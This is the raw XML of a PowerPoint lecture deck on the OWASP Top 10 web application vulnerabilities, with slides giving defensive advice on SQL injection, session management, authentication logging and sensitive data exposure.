    <dgm:cxn modelId="{355E5424-0E71-EB4A-A667-2C3F84C938CC}" type="presParOf" srcId="{E1CE3EE4-2936-4D8B-92A3-E104BE0FAA24}" destId="{9F4DF532-F70D-4CBC-9753-6C2F6F868710}" srcOrd="16" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/default#3"/>
    <dgm:cxn modelId="{5045ECE9-3296-6045-9E32-4E6C2DFEF52F}" type="presParOf" srcId="{E1CE3EE4-2936-4D8B-92A3-E104BE0FAA24}" destId="{BF457B4E-5EEE-4031-B81A-F296B6207577}" srcOrd="17" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/default#3"/>
    <dgm:cxn modelId="{F59E35E1-13B9-CA47-83B6-C0E90D461958}" type="presParOf" srcId="{E1CE3EE4-2936-4D8B-92A3-E104BE0FAA24}" destId="{AB8EC8CA-2DD9-43B0-BAC8-DBF5D6A86196}" srcOrd="1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E9B06-A06B-443C-83A3-58564550A9C4}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="2611" y="593128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sz="1800" b="1" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="2611" y="593128"/>
        <a:ext cx="2072133" cy="1243280"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{0B0642AB-CD2F-4304-92EE-1406BB4F87A3}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="2281959" y="593128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A2: </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" altLang="ja-JP" sz="1800" b="1" kern="1200" dirty="0" smtClean="0">
              <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="1" charset="-128"/>
            </a:rPr>
            <a:t>Broken Authentication</a:t>
          </a:r>
          <a:endParaRPr kumimoji="0" lang="en-US" sz="1800" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
            <a:ln/>
            <a:effectLst/>
            <a:uLnTx/>
            <a:uFillTx/>
            <a:latin typeface="+mn-lt"/>
          </a:endParaRPr>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="2281959" y="593128"/>
        <a:ext cx="2072133" cy="1243280"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{C5B9CDBB-F0C4-8A4C-98BB-AEFE366BA3A3}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="4561306" y="593128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A3 Sensitive Data Exposure</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="4561306" y="593128"/>
        <a:ext cx="2072133" cy="1243280"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{2DE2728E-75C6-D745-9D9B-70EBECEDA741}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="6840654" y="593128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A4: XML External Entity (XXE)</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="6840654" y="593128"/>
        <a:ext cx="2072133" cy="1243280"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{D9922B2F-958F-F940-A0F0-9273CDA240B8}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="2611" y="2043621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A5: Broken Access Control</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="2611" y="2043621"/>
        <a:ext cx="2072133" cy="1243280"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{4B238335-41EA-2E4F-9DD3-FBADF6F79CD6}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="2281959" y="2043621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A6: </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1800" b="1" kern="1200" dirty="0" smtClean="0"/>
            <a:t>Security Misconfiguration</a:t>
          </a:r>
          <a:endParaRPr kumimoji="0" lang="en-US" sz="1800" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
            <a:ln/>
            <a:effectLst/>
            <a:uLnTx/>
            <a:uFillTx/>
            <a:latin typeface="+mn-lt"/>
          </a:endParaRPr>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="2281959" y="2043621"/>
        <a:ext cx="2072133" cy="1243280"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{764C6158-AD60-4271-9C65-2ABDF85CAA50}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="4561306" y="2043621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A7: Cross-Site Scripting (XSS)</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1800" b="1" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="4561306" y="2043621"/>
        <a:ext cx="2072133" cy="1243280"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{7EE8E211-C96C-4DF9-8900-734142B29595}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="6840654" y="2043621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A8: </a:t>
          </a:r>
          <a:r>
            <a:rPr kumimoji="0" lang="en-US" altLang="ja-JP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Deserialization </a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1800" b="1" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="6840654" y="2043621"/>
        <a:ext cx="2072133" cy="1243280"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{9F4DF532-F70D-4CBC-9753-6C2F6F868710}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="2281959" y="3494115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A9: Using Components with Known Vulnerabilities </a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1800" b="1" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="2281959" y="3494115"/>
        <a:ext cx="2072133" cy="1243280"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{AB8EC8CA-2DD9-43B0-BAC8-DBF5D6A86196}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="4561306" y="3494115"/>
          <a:ext cx="2072133" cy="1243280"/>
        </a:xfrm>
        <a:prstGeom prst="rect">
          <a:avLst/>
        </a:prstGeom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2"/>
            </a:gs>
            <a:gs pos="50000">
              <a:schemeClr val="accent2"/>
            </a:gs>
          </a:gsLst>
          <a:lin ang="54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A10: Insufficient Logging &amp; Monitoring</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1800" b="1" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="4561306" y="3494115"/>
        <a:ext cx="2072133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0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3875" y="5294313"/>
            <a:ext cx="5930900" cy="417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342" tIns="44378" rIns="90342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9263" y="592138"/>
            <a:ext cx="6084887" cy="456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37201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604" tIns="45802" rIns="91604" bIns="45802"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80198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325" y="866775"/>
            <a:ext cx="4618038" cy="3465513"/>
          </a:xfrm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494" y="4706732"/>
            <a:ext cx="4967706" cy="416986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7579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537" y="9427718"/>
            <a:ext cx="2946462" cy="4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0721" indent="-284893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39571" indent="-227914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595399" indent="-227914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1228" indent="-227914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07056" indent="-227914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62885" indent="-227914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18713" indent="-227914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74541" indent="-227914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EAFB6ACA-1376-7F49-A38F-0EC0ABD69DC7}" type="slidenum">
              <a:rPr lang="en-US">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>2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537" y="9427718"/>
            <a:ext cx="2946462" cy="4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0721" indent="-284893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39571" indent="-227914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595399" indent="-227914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1228" indent="-227914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07056" indent="-227914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62885" indent="-227914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18713" indent="-227914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74541" indent="-227914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EAFB6ACA-1376-7F49-A38F-0EC0ABD69DC7}" type="slidenum">
              <a:rPr lang="en-US">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>4</a:t>
            </a:fld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680" y="951799"/>
            <a:ext cx="4578639" cy="3438194"/>
          </a:xfrm>
          <a:solidFill>
            <a:srgbClr val="FFFFFF"/>
          </a:solidFill>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3481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51744" y="4722569"/>
            <a:ext cx="4697258" cy="381511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it-IT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325" y="866775"/>
            <a:ext cx="4618038" cy="3465513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494" y="4706732"/>
            <a:ext cx="4967706" cy="416986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2836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868363"/>
            <a:ext cx="4632325" cy="3475037"/>
          </a:xfrm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657" y="4717818"/>
            <a:ext cx="4986685" cy="41793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868363"/>
            <a:ext cx="4632325" cy="3475037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657" y="4717818"/>
            <a:ext cx="4986685" cy="41793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1129240" y="752254"/>
            <a:ext cx="4513796" cy="37137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166" tIns="45583" rIns="91166" bIns="45583" anchor="ctr"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/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="496613" y="4675058"/>
            <a:ext cx="5780632" cy="43979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27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C45C98C0-69FB-804A-BFDE-54222EBC9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9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22A08-FA90-7041-8786-991A9644F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2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230FC-9AE8-D147-90DB-09448F17C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85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6900" y="1257300"/>
            <a:ext cx="8039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5D3A9-F275-054A-9653-E373ED2352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5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457D-72C5-D247-B7A7-0BBAE9DC2C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16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690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265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690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65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87A77-779A-1048-9E31-C1B209E69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799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6400" y="190500"/>
            <a:ext cx="8229600" cy="61722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8F44-7453-C94B-A0CE-688B0862B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BB2DB-918F-E34D-8E11-1D1A703A92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A0D6E-88D4-F141-8688-BCA6ED8A9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43296-E91B-714C-B18D-4A442A4103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1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DF1AC-4A92-B041-B0A6-6D904F16FE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5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354B0-DE32-3F41-8977-D9B2C9D46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24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0C870-1095-4747-8FD3-92FDAC2BE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65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70E58-6695-3247-A475-C87102D34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7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C9D8C-AB7D-804D-8C8B-51F5F488D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20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charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{1E61AE2C-68AA-1F4E-A516-BD119C386C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1032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547F5C-5E3E-6F40-9F12-C761A76F9D1C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8600"/>
            <a:ext cx="7772400" cy="685800"/>
          </a:xfrm>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="92075" tIns="46038" rIns="92075" bIns="46038"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="4800" dirty="0"/>
              <a:t>Security</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="2800" dirty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2" y="2205038"/>
            <a:ext cx="7634288" cy="2328862"/>
          </a:xfrm>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="92075" tIns="46038" rIns="92075" bIns="46038"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
              <a:buFont typeface="Times New Roman" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="4000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Web Application Vulnerabilities: OWASP Top 10</a:t>
            </a:r>
            <a:endParaRPr lang="en-IE" altLang="en-US" sz="40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95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Defences against SQL injection (2)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Check syntax of input for validity</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t>Many classes of input have fixed languages</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t>Email addresses, dates, part numbers, etc.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t>Verify that the input is a valid string in the language</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>Ideal if </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t>you can exclude </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>quotes, semicolons, HTML tags, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="is-IS" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>…</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:endParaRPr lang="en-US" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t>Have length limits on input</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t>Many SQL injection attacks depend on entering long strings</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="40178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Defences against SQL injection (3)</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" altLang="en-US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smtClean="0"/>
              <a:t>Limit database permissions and segregate users</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="2000" smtClean="0"/>
              <a:t>If you’re only reading the database, connect to database as a user that only has read permissions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="2000" smtClean="0"/>
              <a:t>Never connect as a database administrator in your web application</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="1176"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="2400" smtClean="0"/>
              <a:t>Configure database error reporting</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="2000" smtClean="0"/>
              <a:t>Default error reporting often gives away information that is valuable for attackers (table name, field name, etc.)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="2000" smtClean="0"/>
              <a:t>Configure so that this information is never exposed to a user</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="1224"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="2400" smtClean="0"/>
              <a:t>If possible, use prepared statements	</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="2000" smtClean="0"/>
              <a:t>Some libraries allow you to bind inputs to variables inside a SQL statement</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="2000" smtClean="0"/>
              <a:t>e.g. java.sql.PreparedStatement</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-GB" altLang="en-US" sz="2000" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/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45336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BB91C8-5AA2-B943-98AB-7DAC49B8A669}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" sz="1200" b="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>12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0"/>
            <a:ext cx="8775700" cy="1143000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Times New Roman" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="3000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000090"/>
                </a:solidFill>
              </a:rPr>
              <a:t>A2: Broken Authentication &amp; Session Management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8570913" cy="5349875"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>Authentication business logic and data must be </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>server</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0"/>
              <a:t> side</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2400" i="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Rich client logins still possible, but not 100% client-side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Store authentication (and also) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>authorisation</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t> tokens in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" b="1" dirty="0" smtClean="0"/>
              <a:t>session </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>object</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>A session is the time a user spends on a particular visit to a website. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Session data is maintained by the web server in a session object to allow for preservation of state across a sequence of browser requests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400" dirty="0" smtClean="0"/>
              <a:t>Do not use URL rewriting to allow access following authentication</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Bad: http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>www.example.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>/some/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>feature?auth</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>=y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dirty="0" smtClean="0"/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endParaRPr lang="en-US" altLang="en-US" sz="2400" dirty="0" smtClean="0"/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5633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12DC8DD6-F464-CC4F-99B4-FCFA5D0EA315}" type="slidenum">
              <a:rPr lang="en-US" sz="1200" b="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>13</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" sz="1200" b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8597900" cy="9525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GB" sz="2900">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>Session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8570913" cy="5349875"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p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Store session ID in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" b="1">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>session cookie</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" sz="2000">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>Never in the URL (risk of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" i="1">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>session fixation attack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>, among others)</a:t>
            </a:r>
          </a:p>
          <a:p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Make sure framework uses secure session IDs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Session IDs should be </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>long and random </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>– i.e. impossible to guess</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB" sz="24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Provide “Logout” link or button on every page</a:t>
            </a:r>
          </a:p>
          <a:p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On logout, destroy the session object</a:t>
            </a:r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Implement session timeout (idle time, total time)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-GB" sz="2000">
              <a:latin typeface="Arial" charset="0"/>
              <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB" sz="24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4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04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B18D63A9-616C-7545-83DE-B3C5195DA85B}" type="slidenum">
              <a:rPr lang="en-US" sz="1200" b="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>14</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" sz="1200" b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Web authentication – failure/logging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8570913" cy="5349875"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>Authentication code should fail securely</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>Failure modes should not result in successful authentication</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>Count failed logins per user &amp; impose soft lockout on multiple failures</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>Report to user on last login time, failed logins, failed password recovery attempts</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>Count failed logins per app</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>Log all authentication decisions, including failures</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB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75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Web authentication – credentials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854200"/>
            <a:ext cx="8039100" cy="45085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>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>More on web app authentication coming up in a later slide set...</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="2000" dirty="0">
              <a:latin typeface="Arial" charset="0"/>
              <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-GB" sz="2000" dirty="0">
              <a:latin typeface="Arial" charset="0"/>
              <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB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015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Typical issues:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>Sensitive data stored in plaintext form, including on backups</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>Use of old/weak </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>cryptography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Use of insecure transmission protocol</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>Passwords stored in clear</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>Passwords hashed but not salted</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>Key management problems (e.g</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>. use of default keys, insecure </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>key storage, </a:t>
            </a:r>
            <a:r>
